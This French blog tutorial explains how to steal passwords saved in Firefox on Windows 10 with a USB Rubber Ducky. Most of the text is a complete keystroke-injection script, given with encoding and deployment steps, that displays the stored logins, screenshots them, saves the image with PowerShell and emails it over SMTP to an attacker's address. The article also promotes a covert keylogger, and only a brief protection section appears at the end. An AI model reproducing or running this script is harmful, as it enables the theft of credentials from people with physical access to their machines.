Comment pirater Firefox pour récupérer les mots de passe enregistrés

Comment récupérer les identifiants et mots de passe stockés dans Firefox sous Windows 10 à l’aide d’un USB Rubber Ducky ?

Beaucoup de gens vouent une confiance aveugle en leur navigateur internet et leur confient le soin d’enregistrer chaque mot de passe qu’ils créent en ligne.

Si vous êtes l’un de ces utilisateurs, vous devriez peut-être adopter une façon plus sûre de gérer vos mots de passe, car ceux stockés dans un navigateur sont une mine d’or pour les hackers.

Avec un USB Rubber Ducky (une clé USB spécialement fabriquée pour les hackers) et un accès physique à votre ordinateur, ils peuvent avoir une capture d’écran de toutes vos informations d’identification en moins de 60 secondes.

Le stockage des mots de passe dans les navigateurs

Sur le web, de plus en plus de mots de passe sont nécessaires pour gérer ses comptes ou interagir avec du contenu. Tous ces services Web ont des exigences différentes en matière de mots de passe (caractère spécial ou pas, limitation en nombre de caractères, etc.), il est donc plus difficile pour quelqu’un de réutiliser un seul mot de passe sur plusieurs sites, une pratique que personne ne devrait avoir fait au départ.

Des mots de passe uniques pour chaque compte : voilà ce qu’il faut faire. Mais la mémoire humaine n’étant pas très bonne, la plupart des gens ont besoin de leur navigateur pour se souvenir de leurs mdp. C’est pratique, mais pas très sûr à moins que toutes les informations ne soient verrouillées avec un mot de passe maître, ou gérées par un gestionnaire de mots de passe à part.

Certains navigateurs stockent les informations d’identification des utilisateurs en texte brut non crypté. D’autres ont mis en place des dispositifs de sécurité pour empêcher tout utilisateur aléatoire d’afficher les mots de passe du propriétaire. Par exemple, Google Chrome vous demande de vous connecter à votre compte Microsoft avant de pouvoir afficher vos informations d’identification sur un ordinateur Windows 10. Une simple mesure de sécurité comme celle-ci empêche quelqu’un de voir vos mots de passe si vous laissez votre ordinateur déverrouillé.

De son côté, Firefox laisse vos mots de passe incroyablement exposés. En quelques clics (Menu -> Options -> Confidentialité -> Confidentialité & Sécurité -> Connexions enregistrées -> Afficher les mots de passe -> Oui), n’importe qui peut voir les identifiants que vous avez enregistré dans Firefox.

C’est une lacune incroyable pour un navigateur qui se présente comme étant axé sur la protection de la vie privée. Même si Firefox offre une option de mot de passe maître, celle-ci n’est pas activée par défaut. La plupart des utilisateurs n’ouvrent pas leurs paramètres… C’est comme si Mozilla ignorait que le vol des identifiants et des mots de passe est possible.

Qu’est-ce qu’un USB Rubber Ducky ?

Un USB Rubber Ducky est un dispositif développé par Hak5 qui ressemble à une clé USB inoffensive mais qui agit en réalité comme un clavier entièrement scriptable une fois connecté dans un ordinateur.

Les claviers ont la particularité d’être « crédibles » aux yeux des systèmes d’exploitation : ils ne sont pas censés véhiculer des codes, donc les OS ont une confiance aveugle en eux. Si on se fait passer pour un clavier informatique mais qu’on est en réalité un transmetteur de scripts, on a la voie libre pour échapper aux antivirus en tout genre.

Un ordinateur ne peut pas faire la différence entre un humain utilisant un clavier et un périphérique préprogrammé. L’USB Rubber Ducky en profite pour accomplir beaucoup de choses, comme si quelqu’un tapait à distance.

→ Agrandir l’image

Comment l’attaque est exécutée ?

Dans le script que nous allons voir, le Rubber Ducky ouvre Firefox. Ensuite il navigue jusqu’à l’endroit où les informations d’identification sont stockées. Troisièmement, il fait une capture d’écran des login et mots de passe. Quatrièmement, il sauvegarde la capture d’écran sur le lecteur C. Enfin, il envoie la capture d’écran par email à l’adresse de votre choix.

→ Ce dont vous avez besoin

Un USB Rubber Ducky chez Hak5 coûte à peu près 45 euros. Vous pouvez essayer de l’avoir sur Amazon ou le site officiel https://shop.hak5.org/products/usb-rubber-ducky-deluxe. Cet outil permet de nombreux exploits différents, selon le script que vous insérez à l’intérieur.

Avec ça, vous avez besoin d’une carte microSD pour stocker les scripts à l’intérieur.

Et bien sûr, il vous faut aussi un ordinateur pour éditer et encoder les scripts sur la carte microSD.

En ce qui concerne le logiciel, vous avez besoin de Java installé sur votre ordinateur pour utiliser l’application gratuite Ducky Encoder fournie par Hak5, qui est nécessaire pour charger le script.

Si vous le pouvez, créez enfin un compte de messagerie qui sera responsable de l’envoi du courriel, parce que le mot de passe du compte de l’expéditeur sera tapé directement dans la console PowerShell de l’ordinateur ciblé.

A noter : D’autres techniques existent pour pirater les mots de passe, notamment l’utilisation d’un keylogger, un logiciel à installer dans un téléphone portable pour récupérer silencieusement ce qui est tapé au clavier. Nous vous recommandons celui-là qui a largement fait ses preuves.

Script Ducky pour ouvrir Firefox

Attention : ce script ne s'applique qu'aux personnes exécutant des versions récentes de Firefox sous Windows 10. De plus, l'ordinateur doit disposer d'une connexion internet afin que la récupération de la capture d'écran soit possible par email. Enfin, l'utilisateur ne doit pas avoir défini un mot de passe maître pour les mots de passe Firefox.
Ces explications ont un but éducatif seulement. 

La première phase de l’attaque est la plus simple. Le but est d’ouvrir Firefox et de naviguer jusqu’à l’endroit où toutes les informations d’identification sont stockées.

L’USB Rubber Ducky agit comme un clavier, donc toutes les interactions de l’interface graphique doivent être faites avec des commandes clavier.

Pour commencer à écrire votre script, ouvrez n’importe quel éditeur de texte et tapez les sept premières lignes ci-dessous.

DELAY 2000
GUI r
DELAY 500
STRING firefox
DELAY 1000
ENTER
DELAY 4000

Pour aller là où Firefox stocke les mots de passe, ajoutez ces lignes à votre script :

CTRL L
DELAY 250
STRING about:preferences#privacy
ENTER
DELAY 500
TAB
REPEAT 14
ENTER
DELAY 250
TAB
REPEAT 3
ENTER
DELAY 250
ENTER
DELAY 500

Une fois que les mots de passe sont affichés, il est temps de faire une capture d’écran de ce qui est visible à l’écran. Pour cela, ajoutons ceci au script :

PRINTSCREEN
ALT F4
DELAY 100

Maintenant qu’une capture d’écran des identifiants de l’utilisateur se trouve dans le presse-papiers de l’ordinateur, il faut enregistrer ce fichier au format PNG en utilisant PowerShell. Pour ceux qui ne le savent pas, PowerShell est une version plus puissante de l’invite de commandes Windows standard. De nombreuses actions peuvent être réalisées sans interface graphique simplement en utilisant des scripts PowerShell, ce qui est très utile pour tous ceux qui utilisent un USB Rubber Ducky.

Joignons maintenant la partie du script responsable de l’enregistrement de l’image :

GUI r
DELAY 250
STRING powershell
DELAY 250
ENTER
DELAY 250
STRING $screenshot = gcb -Format Image
ENTER
STRING $path = 'C:\Users\Public\passwords.png'
ENTER
STRING $screenshot.Save($path, 'png')
ENTER

Pour récupérer cette image, quoi de plus pratique que d’envoyer cette capture d’écran dans votre boîte de réception électronique ? Pour cette dernière partie du script, ajoutez le texte suivant :

STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('[SENDER EMAIL]', '[SENDER PASSWORD]');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = '[SENDER EMAIL]'
ENTER
STRING $ReportEmail.To.Add('[RECEIVER EMAIL]')
ENTER
STRING $ReportEmail.Subject = 'USER CREDENTIALS'
ENTER
STRING $ReportEmail.Body = 'Voici les identifiants que j'ai trouvés pour toi.'
ENTER
STRING $ReportEmail.Attachments.Add('C:\Users\Public\passwords.png')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 3000
STRING exit
ENTER

→ Agrandir l’image

Maintenant que le script est terminé, enregistrez-le, et convertissez le fichier texte dans un format que l’USB Rubber Ducky pourra lire. Votre fichier texte ressemble à ça :

DELAY 2000
GUI r
DELAY 500
STRING firefox
DELAY 1000
ENTER
DELAY 4000
CTRL L
DELAY 250
STRING about:preferences#privacy
ENTER
DELAY 500
TAB
REPEAT 14
ENTER
DELAY 250
TAB
REPEAT 3
ENTER
DELAY 250
ENTER
DELAY 500
PRINTSCREEN
ALT F4
DELAY 100
GUI r
DELAY 250
STRING powershell
DELAY 250
ENTER
DELAY 250
STRING $screenshot = gcb -Format Image
ENTER
STRING $path = 'C:\Users\Public\passwords.png'
ENTER
STRING $screenshot.Save($path, 'png')
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('[SENDER EMAIL]', '[SENDER PASSWORD]');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = '[SENDER EMAIL]'
ENTER
STRING $ReportEmail.To.Add('[RECEIVER EMAIL]')
ENTER
STRING $ReportEmail.Subject = 'USER CREDENTIALS'
ENTER
STRING $ReportEmail.Body = ' Voici les identifiants que j'ai trouvés pour toi. '
ENTER
STRING $ReportEmail.Attachments.Add('C:\Users\Public\passwords.png')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 3000
STRING exit
ENTER

Afin d’encoder le fichier texte, on peut utiliser le logiciel Ducky Encoder développé par Hak5. Pour installer le Ducky Encoder, dézippez-le dans un répertoire à l’aide de la commande suivante.

git clone https://github.com/hak5darren/USB-Rubber-Ducky.git

Après l’installation de Ducky Encoder, naviguez jusqu’à son répertoire dans une invite de commandes. Ensuite, assurez-vous de brancher une carte microSD dans votre ordinateur, et tapez cette commande pour convertir le fichier texte dans un format lisible par Ducky :

java -jar ~/Downloads/duckencoder.jar -i [Directory of script text file] -o E:\inject.bin

Après quelques secondes, le script est converti et chargé sur la carte microSD. Vérifiez quelle lettre de lecteur est affectée à la carte microSD, et changez la lettre « E » en conséquence. Une fois cette étape terminée, branchez votre carte microSD dans l’USB Rubber Ducky.

Vous pouvez tester ce script sur votre propre ordinateur pour voir s’il fonctionne bien. Si vous n’aviez pas de mot de passe maître défini dans Firefox, votre script devrait fonctionner.

Après avoir donné au script une trentaine de secondes pour suivre son cours, vous pouvez retirer l’USB Rubber Ducky et attendre de recevoir votre email contenant les identifiants capturés.

Comment se protéger contre ce script

Le moyen le plus simple d’empêcher Firefox d’exposer vos informations, c’est tout simplement de ne pas lui faire confiance dès le départ. Configurez un mot de passe maître pour le stockage des mots de passe Firefox.

Vous pouvez aussi utiliser un autre navigateur web ou, mieux encore, utiliser un gestionnaire de mots de passe fiable comme NordPass. Ces applications peuvent générer et crypter automatiquement des mots de passe pour chaque service que vous utilisez, ce qui signifie que vous n’avez à vous souvenir que d’un seul mot de passe maître au lieu d’un nouveau pour chaque site Web.

Enfin, si vous voulez voir si quelqu’un a manipulé votre ordinateur à l’aide de PowerShell, vous pouvez vérifier l’activité PowerShell récente avec la commande suivante :

(Get-PSReadlineOption).HistorySavePath

Quelques liens utiles

• Ouvrir et utiliser PowerShell avec Windows 10 (site Le Coin Du Net)
• La page de vente de l’USB Rubber Ducky par Hack5
• Une liste d’autres scripts mis à la disposition de la communauté
• Notre article sur comment pirater un téléphone grâce au bluetooth (Untelephone.com)
• Pirater simplement un mot de passe Wi-Fi